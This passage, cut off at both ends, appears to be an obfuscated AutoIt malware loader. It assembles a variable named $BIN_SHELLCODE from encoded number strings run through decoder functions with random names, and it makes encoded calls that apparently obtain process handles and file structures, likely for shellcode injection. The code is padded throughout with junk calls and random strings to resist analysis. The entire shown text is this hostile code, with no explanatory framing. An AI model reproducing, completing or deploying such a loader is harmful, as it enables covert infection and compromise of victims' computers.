1138660241 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,6..0,5..7,..53,2,3,..54,..5..,6..1..,..5..4,61,..56..,56,6..,53..,..6..1,..5..4,..5,..59,6,..6,6..,..6..,6,..6.." , ".." ) ) $656182541 = 1924764602 ISSTRING ("ooyvU1D3QrvWTsNLhI2n" ) ENDIF IF $656182541 = 1196440215 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,2..,6..0..,5..9,..5..4,..6..1..,..61..,6..2..,60,..5..8,2,..61..,..61,6..2,60..,..4,..3,..61,5..9,..57,6..1..,2..,5..6,..58,..56" , ".." ) ) $656182541 = 1070530058 RANDOM (1581921 ) PTR (3137932 + 4294245099 + 4293345740 * 1588072 ) ENDIF IF $656182541 = 1203322726 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..3..,58,..58..,61,2..,..5..,3,58,5..9,..58..,..6..0..,6..1..,2,..60,4..,..5..3,6..1,56..,5..6,..6..,..59..,5..8..,60,5.." , ".." ) ) DIM $FKYO6DIFJLDGZGEVC3EL = 967967 $656182541 = 113519199 RANDOM (1893247 ) ENDIF IF $656182541 = 1205248241 THEN LOCAL $HANDLEFROMPID = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,5..7..,5..9..,..3..,..5..9..,..3,57..,..56..,5..9,..5..4,5..9,..3..,5..9..,..3,5..5..,..6..1..,..5..5..,..5..5..,..5..9..,..2,..59,58..,..6..0,55..,5..9,..5..,..5..9,..5..8..,5..9..,..3..,5..6..,..5..6..,56,..55..,..5..5,5,59,..57..,5..9..,..3..,59..,3..,55,..5..5..,..55..,3..,..55,..5..3..,55..,..5..5..,..59,..61..,..59..,..5..4,59..,..5,..59,..5..7,..5..9,..3,..59..,5..8,55..,..5..5..,..5..5,3..,..5..5,..5..3,55,55,..5..7..,..6,60..,5..3,5..9..,..58..,..5..9,5..,58..,5..3,..60..,5..5..,5..9,6,5..9,56..,5..9,5..8..,60,56,6..0,..5..6..,55,55,..55,3,5..5..,5..3..,5..5,55..,59,57..,60..,6..0,..59..,..6,..60,55,59..,..57..,..55..,5..5,55,3..,..5..5,53,5..5,5..5,56,..5..3..,6..0..,..61..,5..6,5..3..,..56..,..5..3..,5..6,..54..,5..7,59..,..56,..53..,5..7..,5..9,..57..,5..9..,5..7..,..5..9,..5..5,..55,55..,3,5..5..,53,55,5..5,..5..9,5..5..,..5..9..,6,5..9..,..6..,5..9..,..3,55,5..5..,55..,3..,..5..5..,..5..3,55,55,56,53..,..55..,..5..5,55..,..3..,5..5..,..53,..55,..55,5..9..,..57..,6..0,..6..0,..5..9..,..6..,6..0,5..5..,..59,..5..7,..5..5..,5..5,..55,..3,55,..5..3,5..5,5..7..,..58,5..5,59,58,..60..,57..,5..8,2,55..,55,56..,..5..3,5..5,55,..5..8,..4..,..55..,..6..2,5..8,2,..55,..5..5..,..56,5..3..,..55..,5..5..,5..8,..4" , ".." ) ) ) ) $656182541 = 1723957288 ISBOOL (1357373 + 756108 + 90066 ) WINEXISTS ("bTKFe1NOEKkZc3zN8atXTiFyDFlI" ) ENDIF IF $656182541 = 1207367525 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,..2..,..5..7,6,..3..,6..,..6,..6..,6,61..,..56,3..,..53,..5..3,61,..58,5..3..,..6..,6..,6..0,..5..8,..4..,..61..,..6..,6" , ".." ) ) $656182541 = 1253993868 ENDIF IF $656182541 = 1223622893 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..53..,..57,..5..9..,..61..,..56..,6,5,..53,5,60..,..3,4..,55,61,2..,..4,..6,59..,1..,54..,..53..,6..1,..4,..57.." , ".." ) ) CHR (1807614 ) $656182541 = 1569955931 ENDIF IF $656182541 = 1253993868 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,58,..4,..5..7..,6..1,5..8,..3..,..53..,53..,6..,..6..1..,..5..7,5..6,3..,..6,..5,..6,6,6..,..6..,..61,2..,57..,59,5..5" , ".." ) ) ISSTRING (2236803 * 1552509 + 3628622 ) $656182541 = 1587018324 ISSTRING (828572 + 2230834 ) ISBINARY (1748020 + 4291756790 ) ENDIF IF $656182541 = 1270739258 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..,6,..6,6..,..6,..62,..56..,2,1..,6..2,57,53..,..5..6..,3..,60..,..6..1..,..58..,60..,..6..1,..6,6,6..,6..,..6.." , ".." ) ) $656182541 = 784317271 ISPTR (600974 * 3910146 * 3137530 ) ENDIF IF $656182541 = 1279551750 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5,6..,5,..6,6..,..6,6,61,4,..57..,58..,62..,3..,5..8..,53..,5..9..,1,..53,5..5,..6..,6..,60..,5..9..,..5..8,5..7" , ".." ) ) PTR ("lUWdmz0U9HwEy9VlLjGs3x7UMv" ) $656182541 = 180257576 DIM $XK4UDAFBGUKU9WEC9LKK = "s7tXXbA1wo1RGItDNRUGhAHTN77H2dzrgHEnJHpzOkTFtcBnU8uD0Nu1y" ENDIF IF $656182541 = 1295546840 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..6,6..,..58..,..5..8,..3..,5..3..,..6..1,..62,57..,..5..8,6,61..,61,..5..8,..3,..5..3..,..60,58..,..5..4..,5..7,..59..,61,5..3,..53" , ".." ) ) PTR ("8sZJK9ef3gBu17RcyKFUX4S5ABmMZ9yzuWmzQTBBiNfocFWxkvlHtteeJ3jiXAq4Sb9fUqvQieKiYD35QYCCX0gaRi0WJsNRxkGaFRM39" ) $656182541 = 856025391 MOD (2907010 , 3741157 ) ENDIF IF $656182541 = 1296565717 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..,..5..3..,2,6..1..,62..,..61..,..5..8..,55,..57,..6,..6..,6..,..6,..6,6..,6..1..,4..,57..,58,2,..5..3,6..1..,62..,..6..1,58" , ".." ) ) $656182541 = 2022545531 DIM $158XLAJGZZ3VN72Z8KJC = 1150284 ENDIF IF $656182541 = 1300820860 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57,..5..3,..59,..57..,..5..3..,..6..1..,..53,..56,6..1..,53,..5..3,..6..0,5..8,6..,..1,..55..,2..,3..,5..4,58,..4..,..3..,..5..5..,..53..,..5..7.." , ".." ) ) $656182541 = 1203322726 ISPTR ("OTJeOeGtbBzyIZZkKjhYDYyuZzdRLTSYU9UkkJrX2Njhc22bBKrJMGw1tpopbZSrULOJfNab1u6ZNqr6HboaBhkmM214ubWc62xzn" ) ENDIF IF $656182541 = 1318416169 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,3..,6,6..,6,..6..,..58..,5..3..,..6..,..6,..60,58,..4..,3..,..6..,..6,5..8,..58,..62..,..53,61..,5..8,..3,53,..53.." , ".." ) ) $656182541 = 100830152 MOD (2861522 , 1236259 ) MOD (189487 , 3886347 ) ENDIF IF $656182541 = 1330478138 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..3,5..,6..1,5..9..,6,..54,..61..,5..3,..4,..6..1..,..6..2..,61..,..5..8..,5..8,5..7,6..,..6..,..6,..6,6,..6..,..61,..2,5..7" , ".." ) ) $656182541 = 1048715572 ISFLOAT (2452762 + 4291149395 + 3191120 ) ENDIF IF $656182541 = 1364348677 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..60,54,5..6,..3,..5..3,56,..6,..5..4..,53..,6..,..2,..6..0..,57,..5..9,..54..,57,6..1,6..2,..6..0,4,..6..,61,61,62" , ".." ) ) WINEXISTS ("V21SpfAAmz1LfOY6btXBocW7WuUaEH2VSMBjgJB4kqMmKZ1H9jOFVBNTg364uz5NGf3CmNZB22r8yIw6Dlbv2w9q8SdmNGIUu8OE6xuvtnN" ) $656182541 = 411711931 ISFLOAT ("G9AjyJWjgMDDKMXutGMA41af1OcNThgsyFOOgzuUmFyt40VQAsIMd3MQ8vrTHhA8" ) DIM $E7HO3L2NXBRKA4VNZHDO = 2037021 ENDIF IF $656182541 = 1368549586 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,6,..61,53..,56,..6,2,61,..5..6,60,..4,5..,..3..,..53,..5..3..,6..1,..62..,5..7..,..6..0,5..6..,..57,..5..3,6..,6..1..,5..7" , ".." ) ) ISFLOAT (511549 + 320807 + 1705817 ) $656182541 = 621304772 ISPTR (2910683 + 2685881 ) ENDIF IF $656182541 = 1396856746 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58..,3..,..53,6..0,..5..7,54,..55..,6..1..,..2..,5..7..,..4,6,..5..7,..61..,5..6..,..3..,..6..0,55..,6..1..,..5..3,6..,..2..,6..0..,5..7..,..59.." , ".." ) ) MOD (1152203 , 663470 ) $656182541 = 823793270 ENDIF IF $656182541 = 1428652054 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,..1,6..2..,5..3..,..53,..5..3..,5..3..,..5..3,5..3,..55..,..53,60,5..7,..5..4,62..,6..1..,5..8..,3,53,..6..0..,..6..2,5..3,..57,5..9..,1" , ".." ) ) $656182541 = 438111387 RANDOM (1807612 ) ENDIF IF $656182541 = 1453481599 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..5..8..,..6..0..,59..,5..7..,5,5..4,..5..3,5..4,3..,..6..0,..6..1,58,..59,..6..1..,..6..,..6,6..,..6..,..6..,..6..,54..,..61,..5..,..57" , ".." ) ) $656182541 = 1947300206 DIM $B3BPOL4V2CE0NUXK0XAK = 255458 * 3018391 * 725577 + 4291946556 WINEXISTS ("DF5nxSbJJaOH91THnd25XQ8pbiQeT1dU8lKtTGa2YmzkyBV4B7GXS9dYHOlob71S64JXqzZRd9gJpY0JxVMWuqc9iWVduV11vSnE17" ) ENDIF IF $656182541 = 1461966853 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,5..8,..4,..3,..6,5,..6,6..,6..,6,..5..8,..53,5..8..,55..,58..,55..,5..9,1,53..,..57..,58,55,..5..8,..55..,..58" , ".." ) ) DIM $TS2CHUYL1PUEWQ2JODNV = 1418218 + 567903 + 926522 + 4292649082 + 4292096687 + 4294442025 + 4292394753 $656182541 = 706340665 ENDIF IF $656182541 = 1469834065 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..6,..57,..1,5..3,..5..7..,5..3,56,..5..8,5..5..,..5..3..,57,..6..1..,62,..57..,4..,6..,5..7..,5..6..,2..,..6..1,..6..,1..,..5..7..,..53.." , ".." ) ) DIM $OT4KFQUHLQSIWWDAIMOA = "C3AhUA2jHDapMGMyHT7m" $656182541 = 1599451200 ENDIF IF $656182541 = 1477365537 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,3,53..,..5..6..,4,58..,..5..3,5..7,..58,5..3..,53..,53..,..5..3,53..,6,6..1..,..57,6..,3,..53..,55,53..,53..,..5..3..,53.." , ".." ) ) INT (70644 ) $656182541 = 2054240656 ENDIF IF $656182541 = 1479637702 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,53..,..5..3..,..53..,..53,5..9..,1,..57,5..3,..59,..6..1,53,..5..3..,..56..,5..3,53..,..53,..5..3..,5..3,6..,..6..,..6..0,59..,58..,..53" , ".." ) ) $656182541 = 1038131997 ISSTRING ("0CyeXr3UZ1cb3rXiTBsiFj1dY9JbWVW5e7gTMOMZfDAjdSJiATdxkuqQLvqYS28eeg76keEdYCdbSR9fzBKdRyVUQzhry" ) MOD (2052693 , 1447557 ) ENDIF IF $656182541 = 1508795126 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..61..,..5..3..,..53..,..5..3..,5..3,..53..,..58,60..,..5..8..,..5..6,..6,..6,..58..,..58..,..3,..57..,..6..1..,5..8..,3..,53..,..5..3,..6,..6..1,..57.." , ".." ) ) $656182541 = 1750055196 RANDOM (1449126 ) ENDIF IF $656182541 = 1513972166 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6,..6,5..6,..56,..3..,5..3,..5..8,6,..58,5..,..5..8..,..2,..61,..2,..5,..58..,58,4,3,55..,..5..3..,..3..,53,5..3" , ".." ) ) INT (951421 ) $656182541 = 1974167312 STRING ("pr5xOvnqU6mN8vZFvLduXEnZRZeBBBm6nB16K8zJGwmzbu" ) CHR (2887679 ) ENDIF IF $656182541 = 1569955931 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,4..,6..1..,5..7..,56,..58,53,..61,..62..,58..,..4..,..6,..3..,..6,..6,5..8,..58,5,..61..,..5..9..,..1,..57,5..7..,6..1,..4" , ".." ) ) INT (3397414 ) $656182541 = 1974292710 DIM $FQ0RVYSUQAGD35WLCXAS = "YwoSaTZ3Ow1g2EsJsVH3QV4d1HXphYdjCortKIUfD0KdQxaAdLkb3yidBl1B5JW0tRMNm98TaBzZj0wCHwlEMbqego1zSsk3e" RANDOM (3022268 ) ENDIF IF $656182541 = 1577105263 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..5..8..,..4,..6..,3,5..6,56..,..6,6..,..6..1..,..56..,..6..0,..4..,..4..,6..1..,..53..,..5..3,..60..,5..7..,..53,..60,5..8,..6..0..,6,..6" , ".." ) ) $656182541 = 172415000 ENDIF IF $656182541 = 1586164444 THEN LOCAL $RET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50..,57,..5..7..,..59,3..,59..,..3,..57..,5..6,59..,5..4..,..5..9..,..3..,5..9..,..3..,..5..7,5..4..,..59..,..57,59..,..57,..6..0..,..5..5..,59..,5..8,60..,..5..6..,..6..0,56..,55,61..,5..5,5..5,5..9..,..5..7,6..0,..6..0,59..,6,6..0,55,59..,..5..7,..5..5..,5..5,..55..,..3,5..5,5..3..,5..5,..57,59..,3..,6..0..,5..3,..5..8,56,59..,61..,..59,58,5..9..,..3,59..,..3,5..9,..5..6..,5..9,6,..5..9..,..5..7,..5..9..,..58..,55..,53..,55,..2,55,..53,5..5..,5..5..,56..,53..,..6..0,6..1..,..57..,5..5..,..57..,..58..,55..,55,..55,..3,5..5..,..53,55..,..55..,60,60,6..0..,56,..60..,..57,6..0,5..5,..55..,5..5..,..5..5,..3..,..55,..53,5..5..,5..7..,..60..,..60,58..,53,..5..9..,5..4..,..6..0..,..57..,59,..6..1,..5..5..,..3,55..,53,..55,55,..60,6..0,..6..0,..5..6..,..6..0,..5..7..,..60..,..5..5..,..5..5..,5..5,55,..3,5..5..,5..3..,..5..5,..55" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,5..5..,5..5,..3..,55,53..,5..5..,5..5..,60..,53..,60,57..,..60..,55..,..55,55..,5..5..,3..,..5..5..,5..3..,..5..7,5..7..,..59..,..3..,5..9,3,..58..,5..6..,6..0..,..57..,6..0,5..5,6..0,5..8,59,..56..,..60..,5..7,..5..7,..60..,..5..9..,5..8..,6..0..,57,..58,..5..3..,..6..0,..5..7..,..6..0..,..5..5,55..,..61,..5..5..,..57,..5..7..,..59..,..59..,6..2,5..9..,..3..,59..,..5..8..,..5..8..,6..,58..,56..,..6..0..,57,60..,..55..,60,..5..8..,59,5..6..,..60,..57..,55,62..,..5..5..,..62.." , ".." ) ) ) ) $656182541 = 1205248241 STRING (2218093 + 880111 + 1666509 ) ENDIF IF $656182541 = 1587018324 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1..,..5..3,..56..,5..7,5..8,..6,61,6..1,..62..,61..,5..8,..3..,5..3,..6,3..,6..,6,6,..6..,..61..,4..,6..1,..58..,54..,53" , ".." ) ) RANDOM (529060 ) $656182541 = 1318416169 ISFLOAT ("VygxSkjh1la0fXvpKtxLFYGAIlZp6ezsjCHDEAOUyqycsJDTL28RuOa72OYGv3" ) ENDIF IF $656182541 = 1599451200 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,53,..5..3..,..5..3,..5..3..,6..0..,55..,..6..2,..58,5..6..,..5..6..,..6..,6,..58,..60..,6,..6,6..0,59..,5..8,..5..3..,58..,..5..6,6,6" , ".." ) ) ISFLOAT (1037561 * 629238 + 4292420501 + 983530 ) $656182541 = 90298599 ENDIF IF $656182541 = 1604509846 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6,..6..,..6..,6..,..6..1,4..,5..7,58,..1..,61..,61..,..62,..61..,5..8..,5..6..,..3..,6..,6..,6,6..,..6,6,..61..,..4" , ".." ) ) ISBINARY ("T7DBJL0MiyFf" ) $656182541 = 2060391673 ISBOOL (3447033 * 534323 * 174310 ) ISPTR (1522803 * 3287096 + 965819 ) ENDIF IF $656182541 = 1655436234 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..8,..58..,61..,..2,..5..,..3..,5..8..,..54,5..8..,54..,..58,56,5..8..,..5..9,5..8..,..6..0,..61,..2..,..6..0,..4,..53,..6..1,56..,..56" , ".." ) ) $656182541 = 781366022 ENDIF IF $656182541 = 1700940958 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..7,6,5..7,..5..8,..2..,..6..1,..58..,..5..3..,5,..6..1..,57,55,6,..5,6..,6..,..6,..6..,..6..1..,..2,6..1..,3..,..2..,5..8..,55" , ".." ) ) WINEXISTS ("FoQjXnHg0L35rQpaRcouYtiq75n0QRYForGCWKUj7R8MvmxvDlCMaISmgzm29SAi" ) $656182541 = 496318929 ISFLOAT ("XofsewguE5VG1vDokE" ) INT (1449336 ) ENDIF IF $656182541 = 1713506615 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("55..,..61..,..6,..6,6,6..,6,6..,..6..1,4..,..57..,5..8..,1..,57..,61,..62,6..1..,..58..,5..5..,..3,6..,6..,..6,6,..6" , ".." ) ) $656182541 = 432319576 MOD (1091695 , 3317559 ) ISSTRING ("R7wu5mL1KDBvhv64M2bBZA2R" ) ENDIF IF $656182541 = 1718368979 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6,..6..,6,5..6..,..2,..57..,5..8..,..53..,3,..60..,57,5..4,..5..7..,..61,2..,..5..8,5..8..,6,3,..5..7,59..,..56,2,60" , ".." ) ) $656182541 = 1051260188 RANDOM (980872 ) ENDIF IF $656182541 = 1723957288 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,5..7..,5..7,..5..9..,3,..59,3,5..7..,56..,..59,..54..,..59..,3,..59..,..3,5..5,..61,..5..5,55..,..5..9..,..2,..5..9,58..,..60,..5..5,..5..9,5,..5..9..,5..8,..5..9..,3..,56,5..6..,..56..,..55..,..5..5..,5..5,5..5..,..3..,..55,..53,..55..,55,..59,5..7,60..,..6..0..,..5..9,6,..60,55,5..9,57,5..5..,5..5,55..,..3..,..5..5,..53,55,5..5..,..5..8..,59,..59..,..62..,..6..0,..55..,6..0..,..5..7..,..60..,5..8..,59..,..5..4..,..59..,3..,..57,..59..,..60" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5..,5..9..,5..8,5..9..,..5..8,5..5,..55,..5..5,..3,..5..5..,..5..3,55,..5..5,5..9..,57..,60,60..,..59..,..6,60..,..5..5,5..9,5..7..,..55,55,..5..5,..3,..5..5..,..5..3..,..55..,..57,5..9..,..3..,6..0,5..3..,..58..,5..6..,59,..61,..59,58,..5..9..,..3..,5..9..,..3,59..,5..6,..59..,..6..,..59..,57..,5..9..,..58,..5..5,..3,5..5,..5..3..,..55..,5..5..,..5..9,..57,..6..0,..60..,5..9,..6,..60,5..5,5..9,57..,..55..,5..5..,..5..5..,..3..,5..5,5..3,55.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,..5..6,..53..,55,55..,..55,3..,..5..5..,..53,55..,5..5,..59,5..7,6..0..,60,..5..9,..6,..60..,..55,..59,..5..7,55..,..5..5..,..5..5,..3..,..55,5..3..,5..5,55,5..6,..53..,..6..0..,61..,5..6,..6..1,5..6,53..,56,5..3,5..6,..53,55,..5..5..,..5..5,62.." , ".." ) ) ) ) EXITLOOP PTR (2269633 * 1876835 * 3508062 ) ENDIF IF $656182541 = 1745262236 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..6..,..6,..6..0,..5..9,..5..8,5..3,5..9..,..1..,53,..53,6..,6,..58..,..5..8,..6..2..,61..,61..,2..,4..,61..,6..1..,58..,4..,..2.." , ".." ) ) DIM $4T4LGD5XQEO3AFWV4GMM = "RzdXsJEvO9V63mEKE0VnryBl6Hvkh1uUrHn41xX3zbKe47g3qUzRA9lr" $656182541 = 937837217 PTR (895226 + 3244402 ) ISBINARY ("KUgd1XpXxq8BB3wANssw579GcQfXXz4tW5QatNIl6EIJ2sVA1xbRv8dMVIalSCa8wOQGnwg9UgAAxyNU4O5yym8X1coUMxDDEKnnMnmDqb7oHMow5qrcG" ) ENDIF IF $656182541 = 1747756201 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..5..8,3,5..3,53,..6..,..6..1,..5..7..,..60..,..61,..5..3..,..55..,5..3..,5..3,..53..,53..,6..1..,..2..,..5..7,58,2,..3,..56..,2..,..57.." , ".." ) ) DIM $2QKHWVWL75WKAGQBBIWP = 2912788 + 961618 * 3511725 * 1476387 + 1750659 * 3602516 $656182541 = 1942454486 ISBOOL ("4OKLKRBlDjKKfBm48MAwpH9qlabVh5vhzfoSOgNHvR" ) ENDIF IF $656182541 = 1750055196 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,2,..6..,5..,6,6..,..6..,..6..,5..8..,6..0..,..59..,..1,..53..,57..,..6..1..,..4,..57..,..58..,..6..,6..1,58..,..5..3..,..6..1..,..2..,61" , ".." ) ) $656182541 = 1207367525 PTR ("hhOgvOuAKORdIYCkanDp192bImWVuiJ59woaV82ctQd3NMWybO1nu3RioNHj2IfBe" ) ENDIF IF $656182541 = 1791187076 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,5,..5..7,..6,5..,..6..,..6,..6..,6..,56..,..5..6..,..3..,53,..61,6..2..,60..,4,..6,..57..,..59..,..59,56..,..2,57..,5..9" , ".." ) ) DIM $CZBUB5K59W5ZXUQRVJFQ = 388633 * 456518 + 4292093314 + 3032764 + 4292546598 * 3509147 $656182541 = 896046375 PTR (972489 * 3553081 * 2050349 + 961001 ) ENDIF IF $656182541 = 1808850186 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("54..,61,5..3..,..5..6,..3..,6,..61,..6..2..,..58..,58..,6,3,6..1..,..62,..57,..4,..6..,..6..1,61,62,57,..58..,..53..,61..,6..1" , ".." ) ) PTR ("Sl8EDSsJMrkJtlEwYIlA" ) $656182541 = 848901156 DIM $F0Y8O5LAFRJGV06PPKW5 = 3542878 + 3114696 + 3677996 * 2534245 * 2891525 + 1931075 * 1284846 + 4294211399 ENDIF IF $656182541 = 1832168266 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1..,57,1,..4,..5..3..,55..,..53..,53..,53..,5..3..,..6..1..,..4..,..6..1,58,..5..4..,..5..3..,6,..3..,..6,..6..,..6..,6,58..,53,..6.." , ".." ) ) $656182541 = 50926388 MOD (1598641 , 3539042 ) ENDIF IF $656182541 = 1859058315 THEN LOCAL $FILE_STRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50,57..,..5..7,59,3,..59,..3..,5..8..,..56..,60..,..5..7,60,55..,60..,58,5..9,56..,60,5..7..,57..,..5..6,..60,55..,..59,58..,59,..5..4..,60,..57..,..59,5..8,55,61..,..55,..55..,5..9,55..,..60,..6..2,60..,57..,..59..,5..8..,55..,..5..3..,59..,..1,59..,..2,60..,5..6..,5..9,..5..7,..5..9..,5..9,..59..,6..1,..5..9..,2,..59..,..1..,..59,..57..,..60..,..56,6..0,..5..4..,5..9..,61..,..59,..59..,59..,..2..,..5..9,1..,6..0..,54..,60..,5..6,..59..,..61..,59..,57,59,59,5..9..,..2,..5..9..,..1..,..5..9,5..7,60..,5..6,6..0,..5..4..,59,61,59..,..62..,..59..,5..9,..6..0,58..,59..,6..1,60,5..6,..5..9..,..5..7,..6..0..,54,..5..9..,62,..5..9..,5..9,..59..,..55..,..59..,..5..,6..0..,5..9..,5..9,..1..,59..,2,..59,..3..,..60..,..56,..59..,..5..7,..60..,59" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,5..6..,60,5..4,..59..,..5..7..,..5..9..,59,60..,..5..6,..58..,..2,55,..55..,..55,..5..3,55,..5..9..,5..5,..53,..58,..56,..60..,57..,6..0,..5..5..,..59..,62,59,5,59..,6..0,..57,..3,..5..9,..58,5..9,5,5..5,61..,5..5..,57..,5..9..,3,..6..0,..53,57..,..59,..59..,..62,5..9,3,..59..,..5..8..,55..,62..,55,5..3,5..5,..59,55..,5..3,5..5..,..55..,..5..8,..4,..5..5..,5..5,5..5,62" , ".." ) ) ) ) MOD (1417388 , 2000101 ) $656182541 = 1877228926 ENDIF IF $656182541 = 1877228926 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50,5..7..,5..7..,59..,..3,59..,3..,..5..8,5..6..,..60..,..5..7..,6..0..,55,..60..,5..8,..59..,56,6..0..,57,5..8..,..56..,59..,58,..60,..57,57,57,..59,5..4,..6..0..,57..,59..,54..,..5..5..,..6..1,..5..5,..57,..58,..5..6,5..9,..6..1,..59,..5..8..,5..9..,3,59..,..3,..5..9..,56..,5..9,6,..5..9,57..,..59,..58..,58..,..6..,5..8,56,..60,5..7,..60,..5..5,..60..,..58..,59..,..5..6,..6..0,57..,55..,..3,..55..,5..3,5..5..,55..,5..9" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..,5..9,5..9..,5..9..,..57,5..9..,..6..,5..9,62,..5..9,2..,..59..,..1,59,..6..1..,59,..5..9..,59,5..7..,59..,6,..5..9..,62,..6..0..,..54,..59..,..1,..5..9..,59,..59,..6,..5..9..,..62..,59,1,60..,..54..,..5..9..,57..,..6..0..,5..6,59,..6,5..9,..62.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("59,..59,..59,..1..,5..9..,..5..,5..9,5..7..,60..,..5..6,6..0..,..5..4..,..59..,6,59..,..62,59,5..9,59,..57..,..5..9,59..,60,..56..,6..0..,..54,59..,60..,6..0..,..5..6,55..,..5..5..,..5..5,3..,..5..5..,..5..3,5..5..,..5..7,5..7,..5..5,..59..,6..2..,..5..9,..5..,58..,..6,..5..8,5..6,..5..9,..61..,59..,..58,..59..,..3..,..5..9,3..,..5..9..,..5..6..,..59..,6,..5..9..,5..7,..59,5..8..,..55,62.." , ".." ) ) ) ) $656182541 = 9803637 ISFLOAT ("S1mUWVNCDL7HGa78DmSrCGbwD" ) ENDIF IF $656182541 = 1885155689 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6..,..6..,..60,6..2..,..5..6,1..,56,3,5..3..,60,6..1,62,..61,..5..8,..5..5,5..3,6,6,6..,6,6,6,..6..1..,..2.." , ".." ) ) $656182541 = 1970938970 MOD (2335494 , 3656525 ) DIM $JC5CSBSKJYSAEFE1ABUL = 3323231 * 1033960 * 673699 ENDIF IF $656182541 = 1921072536 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..56,56..,..3..,6..2..,61..,..5..6..,..5,..6..1,53,..61,6..1,62,57,..4..,..6,..5..3,1,6..2..,..6..,..5,..6,..6,6..,6.." , ".." ) ) MOD (132187 , 174381 ) $656182541 = 1082073854 PTR (1563163 + 1001748 + 4293192249 ) MOD (2719725 , 1434301 ) ENDIF IF $656182541 = 1922466865 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,..4..,54..,56..,4..,..53..,..2..,3,60,..57,..5..8,61..,..61..,57..,5..7..,..5..5..,..60..,5..5..,..56..,..53..,..6..,3..,60,5..7,5..8.." , ".." ) ) INT (591028 ) $656182541 = 1330478138 WINEXISTS ("9yUWnsW7BIgmwkWRMJVBswyLJvJSUgsiQ30tMOc7XDw1hD8zALFijC" ) ENDIF IF $656182541 = 1924764602 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC 